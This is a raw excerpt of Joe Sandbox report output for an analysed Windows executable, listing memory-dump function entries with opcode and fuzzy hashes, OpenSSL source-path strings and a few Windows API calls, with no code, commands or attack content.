                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <#b
                                  • API String ID: 0-3475354355
                                  • Opcode ID: a33de9480ec9c35ec85f10a33f59c2ce030acdddaa6af375090e52c2f23a173c
                                  • Instruction ID: 9b29e891a787150f5fa7d491816d70d8a534b8054fd437c4b479be276f74d76b
                                  • Opcode Fuzzy Hash: a33de9480ec9c35ec85f10a33f59c2ce030acdddaa6af375090e52c2f23a173c
                                  • Instruction Fuzzy Hash: 6DD23FB2F083544BDB1C8E19ECB167EB6D2BBD4204F0E852EF48BC3381EE7555199689
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\bn\bn_recp.c$Vp^
                                  • API String ID: 0-543820952
                                  • Opcode ID: ed2e5a39b3dcd3f3a33393f65134698b568e832ab918d4a18dae1d34e87caebd
                                  • Instruction ID: c8225921bb884dc06d9cb9eb85984cfdc779be11d73ec82ec1364de0df06d8e0
                                  • Opcode Fuzzy Hash: ed2e5a39b3dcd3f3a33393f65134698b568e832ab918d4a18dae1d34e87caebd
                                  • Instruction Fuzzy Hash: 94220971A083148FD354CF69C48064AFBE2BFCC314F598A6DE9989B316E771E916CB81
                                  Strings
                                  • .%lu, xrefs: 005DE297
                                  • ..\..\openssl-1.1.0f\crypto\objects\obj_dat.c, xrefs: 005DE27D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .%lu$..\..\openssl-1.1.0f\crypto\objects\obj_dat.c
                                  • API String ID: 0-85154685
                                  • Opcode ID: a32914986315e97b741afe7b0c6922aae8202d9dbbf882c1c66dae6e3a56c72a
                                  • Instruction ID: a32ae77b3af042220ebe08ee0b4387888f3975d7f35c8a7025722b496d60f4da
                                  • Opcode Fuzzy Hash: a32914986315e97b741afe7b0c6922aae8202d9dbbf882c1c66dae6e3a56c72a
                                  • Instruction Fuzzy Hash: 92910371A083429BD731AE6D988673BBFE8BF95344F44092FF8859B342E771D904C692
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$expa
                                  • API String ID: 0-3278378397
                                  • Opcode ID: 11f6e8e2b3cc51e80353b7a2663130facf9df37a2a1c27d123c8f2797cba41f1
                                  • Instruction ID: db8c2cf30b41ae393013776f9ad6a9bb03fc6291880b6ee24a6a2db36ce7f6af
                                  • Opcode Fuzzy Hash: 11f6e8e2b3cc51e80353b7a2663130facf9df37a2a1c27d123c8f2797cba41f1
                                  • Instruction Fuzzy Hash: EFC1B3B2A183418FC754CF29C48065AFBE2BFD8344F559A2EF598D3211E770EA498F46
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: gfff$jjj
                                  • API String ID: 0-3352304714
                                  • Opcode ID: 0988731474202fb27a5ad55fc1d73069558f5422338a9be7f0ce6e9f0b5d86ec
                                  • Instruction ID: 3239c0e361b91912d0607e82bf1194cdac95ccb6ed7c7658d035768f57fa8980
                                  • Opcode Fuzzy Hash: 0988731474202fb27a5ad55fc1d73069558f5422338a9be7f0ce6e9f0b5d86ec
                                  • Instruction Fuzzy Hash: 8391E4B09043469FC714EF39AC497377BA9FB94344F04592AF989D7252EF34D9088B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: A__
                                  • API String ID: 0-1223570203
                                  • Opcode ID: d6f7dc12975aaec907bef987af8bbd2ce596bd37e97cb4d3ff2444c42d9b5dae
                                  • Instruction ID: e559558d938c4582bf334faa0e232d074e6be723a7e66ce6e20335824e3bf4f0
                                  • Opcode Fuzzy Hash: d6f7dc12975aaec907bef987af8bbd2ce596bd37e97cb4d3ff2444c42d9b5dae
                                  • Instruction Fuzzy Hash: C4923E76A308554BC71CEF19FC625267363B75F35174A521AE203CF790EA29FA23EA40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: e_
                                  • API String ID: 0-124733211
                                  • Opcode ID: 4fa4d393343cb4def561535e859b4c5f3fff969e0915e1030c81407b91f38318
                                  • Instruction ID: 1d101a22824b3e4ad6b998050e9468fe4c8031555e679bca799bb7c96e6b52c7
                                  • Opcode Fuzzy Hash: 4fa4d393343cb4def561535e859b4c5f3fff969e0915e1030c81407b91f38318
                                  • Instruction Fuzzy Hash: B9920C76A308554BC71CEF19FC625267363B75F35174A521AE203CF790EA29FA23EA40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\ec\ec_mult.c
                                  • API String ID: 0-4193766086
                                  • Opcode ID: 15d54c08585963810f3c7c78ab8a844bceac7c082ba319fa20a19552d57c6b7f
                                  • Instruction ID: 0845defe1add6195d41a25dc75eb716d61a49e34215f835a3b4064df7b809c0f
                                  • Opcode Fuzzy Hash: 15d54c08585963810f3c7c78ab8a844bceac7c082ba319fa20a19552d57c6b7f
                                  • Instruction Fuzzy Hash: C9526C71A483029FD720DF58C881B9BBBE2BF84744F14082DFA8597392DBB1D945CB92
                                  Strings
                                  • ggen..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c, xrefs: 0064D096
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ggen..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c
                                  • API String ID: 0-4085895449
                                  • Opcode ID: 53440b64d50da7cf3afdc6534c9ee3cfedb27e613df8d75394b835c4f257e32c
                                  • Instruction ID: 62c95c2b7578b7e42bfe57a835b11d74fe1b24b0f280636d290260b7c579e567
                                  • Opcode Fuzzy Hash: 53440b64d50da7cf3afdc6534c9ee3cfedb27e613df8d75394b835c4f257e32c
                                  • Instruction Fuzzy Hash: 4032B371908342ABD731AF649C05B6BBBEABFC5744F04082DF98893352E771E915CB52
                                  Strings
                                  • ..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c, xrefs: 0064C34A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c
                                  • API String ID: 0-3552984871
                                  • Opcode ID: be78e62c5e64a88b1e6b044ae07d322e2ef6d4d2092b0afb0319f5c67eb70c58
                                  • Instruction ID: 7b833e94dbc2e543496c8231e0162f89b69011ea81a6eb93ef528b217cab5e1f
                                  • Opcode Fuzzy Hash: be78e62c5e64a88b1e6b044ae07d322e2ef6d4d2092b0afb0319f5c67eb70c58
                                  • Instruction Fuzzy Hash: 7212E671919341ABD760AB74DC45FAFBBEABF84354F04082EF98892352E731D950C762
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ]p_
                                  • API String ID: 0-1338921314
                                  • Opcode ID: 823f790f840fa1ec558894f0099daee8b5da7571923d0e8d3a981fc2dc55c7cc
                                  • Instruction ID: d5eda93aa63627fd34c3b4cb6f33cc6cce182817943c88c5ccd964e06a2c10b1
                                  • Opcode Fuzzy Hash: 823f790f840fa1ec558894f0099daee8b5da7571923d0e8d3a981fc2dc55c7cc
                                  • Instruction Fuzzy Hash: BB028F3050D3D14FD319CF2D889056AFFE1AAD6241F488A9EF4E5CB383D529D609CBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: a_
                                  • API String ID: 0-1077840241
                                  • Opcode ID: 6a8c18c6e69379e227438806f98ade2acb2a5c9f236a0f4dd24a5f14cf2ec8e8
                                  • Instruction ID: 09c46c756df0085ffae154d61b04aa0e4e8ac271217f4ed374614c63d9ffd9e0
                                  • Opcode Fuzzy Hash: 6a8c18c6e69379e227438806f98ade2acb2a5c9f236a0f4dd24a5f14cf2ec8e8
                                  • Instruction Fuzzy Hash: 44F1732050D3D58FD359CF2D485046AFFE1AAD6241F4886AEF4E5DB383C638D609CBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 6dd7b99ce50a78bb793786b1abbebd8984d00144d135d6dfebe97f7c5614d0eb
                                  • Instruction ID: 48b6931a786c020a9d5a1a3ac4160d8031faf4f7b07585056198bc603af9cfa0
                                  • Opcode Fuzzy Hash: 6dd7b99ce50a78bb793786b1abbebd8984d00144d135d6dfebe97f7c5614d0eb
                                  • Instruction Fuzzy Hash: 80F16E71A087468FC710CF28C48096ABBE2FFD9345F144A2DF99997352EB31E949CB52
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005D27FA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: bec588fe5431f74dd64d559377b2ee2e118b8f851078bab74d27eac21c171e70
                                  • Instruction ID: 7757293d53c3d03ecd441ffb159df4055d7f1915f284150de9a4c4d7fab2e264
                                  • Opcode Fuzzy Hash: bec588fe5431f74dd64d559377b2ee2e118b8f851078bab74d27eac21c171e70
                                  • Instruction Fuzzy Hash: AF5137B2A012058BEB24CF58D8857AEBBF1FB98314F24852BD455EB350D374DA40DB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: {|_
                                  • API String ID: 0-3753583676
                                  • Opcode ID: a033b74eb878ecafc27d123d0f18be1796d91dedcb04b286b3c53f7163df274d
                                  • Instruction ID: f1a9a103bc0845b581c043b419ed29a89d81256a2a5da85ac7d9b721a6fabe69
                                  • Opcode Fuzzy Hash: a033b74eb878ecafc27d123d0f18be1796d91dedcb04b286b3c53f7163df274d
                                  • Instruction Fuzzy Hash: 0DE1852051D3D55FD759CF2D889006EBFE1AAD6201B48869EF8E4DB383C628D615CBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\rsa\rsa_oaep.c
                                  • API String ID: 0-4203199248
                                  • Opcode ID: d5fccce148f451053fc875131166697beeea20f0deaf9303a033671b56311058
                                  • Instruction ID: 0597b00f9cd637776b7fdcf364087cdef74824125d274fda543672af52b2cdca
                                  • Opcode Fuzzy Hash: d5fccce148f451053fc875131166697beeea20f0deaf9303a033671b56311058
                                  • Instruction Fuzzy Hash: 3AC1E371A083869BD724DF39C885B6EBBE5BFD8304F044A2EF58997242EB30E5458752
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\evp\e_chacha20_poly1305.c
                                  • API String ID: 0-3602246229
                                  • Opcode ID: d8e2a883f7629dab14aa85ef64d9836a43015eccc819cfef5421113ccbc7d9d5
                                  • Instruction ID: 9180aac380dfad4799363b0da10de90456d222a3df6638bcaad379300d04761d
                                  • Opcode Fuzzy Hash: d8e2a883f7629dab14aa85ef64d9836a43015eccc819cfef5421113ccbc7d9d5
                                  • Instruction Fuzzy Hash: 3491D7716087519EE728DB3DC4A577AFFE0BB84305F44456FE5AA86282E738E104CBA1
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000126C1,005D2018), ref: 005D26BA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 540634b229226ab70a8b0de6b5c45b606cdad73d0595cf69b80f02af657cddf8
                                  • Instruction ID: b48f02946a4fe7270abeee2bea61d8a2c3b8eaaf3dfa260c2ee41c43b74b548d
                                  • Opcode Fuzzy Hash: 540634b229226ab70a8b0de6b5c45b606cdad73d0595cf69b80f02af657cddf8
                                  • Instruction Fuzzy Hash:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ?b
                                  • API String ID: 0-525582036
                                  • Opcode ID: 529bb3fef363124c2a0a2625e4c6a8b2254767bd7c364dbe6cbbfd9987872eab
                                  • Instruction ID: bb47c936a5a6c62e8b30eac516466c6c3825d341c329f88be75ae3b8a46c42cc
                                  • Opcode Fuzzy Hash: 529bb3fef363124c2a0a2625e4c6a8b2254767bd7c364dbe6cbbfd9987872eab
                                  • Instruction Fuzzy Hash: 0B711471A083658BC710DE28D8807ABBBD6BFD5354F05096DE8D9AB342D739CA09CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: 4c1298dfc29aca0bae9004ff2ce92848b2329a14e0d06d1a90405958d80da08f
                                  • Instruction ID: 94a2bc543db52b9e6f75cd85702ebd1abac712f11d6e22990314a79980366f7f
                                  • Opcode Fuzzy Hash: 4c1298dfc29aca0bae9004ff2ce92848b2329a14e0d06d1a90405958d80da08f
                                  • Instruction Fuzzy Hash: FF515771600B48D7DB345D68C6667FF6B8B9B82340F1C2419E882CB782D715DDC6CB66
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: 0
                                  • API String ID: 0-4108050209
                                  • Opcode ID: a6da3a0bf173b1d3ab55985976d4f44abef9db43072a62e8012d12f3f55e6eec
                                  • Instruction ID: aed7442e4813ad8505172894f647404ac564c60ecb963dfb3bf93bb1401f4a8c
                                  • Opcode Fuzzy Hash: a6da3a0bf173b1d3ab55985976d4f44abef9db43072a62e8012d12f3f55e6eec
                                  • Instruction Fuzzy Hash: CD517A71A04A45D7DF385A6884967FE27DF9B43304F18361DDA82CB382C725EDC2839A
                                  Strings
                                  • ..\..\openssl-1.1.0f\crypto\modes\ocb128.c, xrefs: 006161A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\modes\ocb128.c
                                  • API String ID: 0-1267065356
                                  • Opcode ID: 848885a741b180ab4bdab84e2aec254ad072fdae3700d2c002c9d063262a759c
                                  • Instruction ID: 96fa1e7881466ceb509db9fa2e91a97e8720dccc929de6a96e87f997d53dd035
                                  • Opcode Fuzzy Hash: 848885a741b180ab4bdab84e2aec254ad072fdae3700d2c002c9d063262a759c
                                  • Instruction Fuzzy Hash: 6041DF70144395EBDB14CF61C842FE67BE8AF06308F04809EF9989B1C2C679E915DBA4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb396269b5e146586958e721ab2957612fc184c2263a57237ccfe1829ae1fc7c
                                  • Instruction ID: 67b02b9916ce833dbf80f9be3689f4e2577caa76b284ed2b98e38102fa9a560f
                                  • Opcode Fuzzy Hash: cb396269b5e146586958e721ab2957612fc184c2263a57237ccfe1829ae1fc7c
                                  • Instruction Fuzzy Hash: 0A829571A147644FE358CF2E8C8015ABBE2BBC8300F45472EE99ADB792D670E915DBC4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0cdcd3c4d492764560de61dbde4139b54b4cdcde607d62e52cba6eb305810241
                                  • Instruction ID: 689d6a7dec5c662f5669be795935058cc2954c48ee1cdcf8d48db49cfc2f8f1b
                                  • Opcode Fuzzy Hash: 0cdcd3c4d492764560de61dbde4139b54b4cdcde607d62e52cba6eb305810241
                                  • Instruction Fuzzy Hash: 6B82B8306141518FD708DF1EEC9043AB7E2E78E301786967EA186D7691CB39F53ADBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bafefbe0c11be7a79604d6a866a89635201018bf272258e0516462eff418d2e7
                                  • Instruction ID: e2d72ddb91300da6d05b964990306f3f711d363753a679314429d024261547ec
                                  • Opcode Fuzzy Hash: bafefbe0c11be7a79604d6a866a89635201018bf272258e0516462eff418d2e7
                                  • Instruction Fuzzy Hash: 6182B8306141518FD708DF1EEC9043AB7E2E78E301786967EA186D7691CB39F53ADBA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aaada805924e684bd3e223060b5788b012fadb3525f6169ac908c75ce37fffa1
                                  • Instruction ID: 7e2e6fbcc3be97b24e1ceb8083bf4675c89c7fa642640218308ccb0fc8991dd1
                                  • Opcode Fuzzy Hash: aaada805924e684bd3e223060b5788b012fadb3525f6169ac908c75ce37fffa1
                                  • Instruction Fuzzy Hash: 0142A3B2B0C3640BDB1C8E1DDCB527EBAD36FD4304F0E856EB49783392DE6895049699
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49422b099c3754261f220d4c7d4ef36a8fe3d97214b4f7078c96449d98e6645f
                                  • Instruction ID: b443bdd572416511cd85cb01b30a85ababada51590f0182660a67f9ffd6d30e3
                                  • Opcode Fuzzy Hash: 49422b099c3754261f220d4c7d4ef36a8fe3d97214b4f7078c96449d98e6645f
                                  • Instruction Fuzzy Hash: D6523D716101654FC708DF2EACA143A7792E78A301786527EE586C73D1CF79E62ACFA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7417efe6df2ea1376c3ce2d76b94d38b9e1d07012f0762d71928b0b22de9ef65
                                  • Instruction ID: 1a4f0c21ffa6c6060927e79eb134f52caf0d3760bddee9bf86bd79ed29ffea3d
                                  • Opcode Fuzzy Hash: 7417efe6df2ea1376c3ce2d76b94d38b9e1d07012f0762d71928b0b22de9ef65
                                  • Instruction Fuzzy Hash: B462AF71A483418FC358CF5DC991B4AF7E5BFC9308F09992EE59987362E370D9848B86
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51805aee3b5ca0aa1aac51f442decb58717be1757ea8a9a9060c57029233e147
                                  • Instruction ID: c413ca8606f41f2682354b13ab78ff4ccbcd38ca24b09618bff3b65f8f943c37
                                  • Opcode Fuzzy Hash: 51805aee3b5ca0aa1aac51f442decb58717be1757ea8a9a9060c57029233e147
                                  • Instruction Fuzzy Hash: 464262717141614BDB0CDF16E8B043AB7A3ABDE30074A866DDA475B791C634BA19CFE0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
